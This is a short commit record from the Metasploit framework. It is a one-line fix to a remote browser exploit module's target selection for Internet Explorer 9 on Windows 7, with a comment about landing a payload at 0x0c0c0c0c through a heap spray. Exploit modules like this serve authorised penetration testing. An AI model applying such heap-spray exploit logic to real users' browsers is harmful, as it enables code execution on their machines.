Fix logic to spray correctly IE9

bug/bundler_fix
jvazquez-r7 2013-08-27 09:57:55 -05:00
parent f8d1d29648
commit 66fa1b41aa
1 changed files with 1 additions and 1 deletions

View File

@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Land the payload at 0x0c0c0c0c
case my_target
when targets[7]
when targets[6]
# IE 9 on Windows 7
js = %Q|
function randomblock(blocksize)